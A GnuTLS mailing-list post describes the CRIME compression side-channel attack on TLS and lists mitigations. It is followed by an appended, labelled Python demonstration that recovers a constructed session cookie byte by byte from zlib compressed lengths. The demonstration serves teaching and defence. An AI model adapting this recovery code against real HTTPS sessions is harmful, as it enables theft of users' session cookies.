Hello,

If you're not already aware, there is a new attack on TLS called "CRIME". I was asked by the author of this attack not to disclose any information, but it seems it is public already [0], so I can comment on it.

The attack takes advantage of compression: by forcing an HTTPS client to use carefully formatted data, it may be able to guess the contents of other data not controlled by the attacker, based on the compressed size. Because there is no formal description of the attack, nor a precise use-case where the attack is considered dangerous, there may be overreactions.

The attack works when you have compression enabled and data from an adversary can be mixed with sensitive data (e.g. a URL that is provided by an adversary is mixed with secret cookie data in an HTTPS request). Moreover, the adversary must be able to invoke multiple trials (e.g. force a user to visit specially crafted URLs again and again, perhaps by using JavaScript).
So currently the threat is mostly on the HTTPS protocol and especially browsers.

To sum up.

* Who does this attack affect:
  1. Clients or servers that use compression and provide the ability to an adversary to inject data (multiple times) in their session.

* How to mitigate the attack?
  1. Do not enable compression (GnuTLS doesn't enable it by default).
  2. When using compression, use the CBC ciphers that include a random padding up to 255 bytes. That would increase the number of trials an attacker needs to perform significantly.
  3. Make sure that even if you must mix adversary-controlled data with sensitive data, the adversary cannot trigger that multiple times.

I'll add a recommendation on the web site later today.

regards,
Nikos

[0]. http://arstechnica.com/security/2012/09/crime-hijacks-https-sessions/

_______________________________________________
Help-gnutls mailing list
help-gnutls@gnu.org
https://lists.gnu.org/mailman/listinfo/help-gnutls
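The compression side channel described in the mail, as an added worked example that is not part of the original post and not GnuTLS code. It stands in for TLS-level DEFLATE compression with `zlib` on the HTTP plaintext a browser would send: the attacker controls the URL, the browser appends a secret cookie, and the only thing the attacker observes is the compressed length (which encryption does not hide). The host name, cookie value, and hex alphabet are constructed assumptions for the demo.

```python
import zlib

# Constructed example request. The cookie value is a made-up secret the
# attacker does not know; everything else is what a browser would send.
HOST = "example.com"                      # assumption: hypothetical host
SECRET_COOKIE = "sessionid=7f3a9c2e1b"    # constructed secret, not a real value
KNOWN_PREFIX = "sessionid="               # the cookie name is public knowledge
ALPHABET = "0123456789abcdef"             # assumption: session id is lowercase hex


def build_request(path: str) -> bytes:
    """Plaintext handed to TLS: attacker-chosen path, browser-added secret cookie."""
    return (
        f"GET {path} HTTP/1.1\r\n"
        f"Host: {HOST}\r\n"
        f"Cookie: {SECRET_COOKIE}\r\n"
        "\r\n"
    ).encode()


def compressed_size(path: str) -> int:
    """Stand-in for the TLS record length the attacker sees on the wire.

    TLS compression runs DEFLATE over the plaintext before encryption, and
    encryption hides content but not length, so len(deflate(plaintext)) leaks.
    """
    return len(zlib.compress(build_request(path), 9))


def recover_secret(oracle, known: str, alphabet: str,
                   window: int = 7, max_len: int = 64) -> str:
    """CRIME-style byte-at-a-time recovery using only compressed lengths.

    Each round injects the last `window` known bytes plus one candidate byte
    into the attacker-controlled URL. Only the correct candidate extends the
    LZ77 match against the cookie by one byte, which removes one literal from
    the DEFLATE output and makes that request shorter. Keeping the injected
    window short keeps the match length inside a single DEFLATE length bucket,
    so the saving is exactly one byte per round instead of a noisy fraction.
    """
    recovered = ""
    for _ in range(max_len):
        tail = (known + recovered)[-window:]
        sizes = {c: oracle("/?" + tail + c) for c in alphabet}
        best = min(sizes.values())
        winners = [c for c, n in sizes.items() if n == best]
        if len(winners) != 1:
            # No candidate is uniquely shorter: either the secret has ended
            # (the next byte is outside the alphabet) or the oracle is noisy.
            break
        recovered += winners[0]
    return recovered


def attack() -> str:
    """Run the recovery against the constructed request; returns the guessed secret."""
    return recover_secret(compressed_size, KNOWN_PREFIX, ALPHABET)


if __name__ == "__main__":
    guess = attack()
    print("recovered:", guess, "correct:", guess == SECRET_COOKIE[len(KNOWN_PREFIX):])
```

Each round needs 16 requests and a single length comparison per candidate, which is why the mail stresses that the adversary must be able to trigger the request repeatedly. Swapping `compressed_size` for an oracle that adds a random amount of padding (the mail's second mitigation) turns that single comparison into a statistical one that needs many trials per candidate, and `recover_secret` will then stop early on a tie instead of returning a confident guess.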
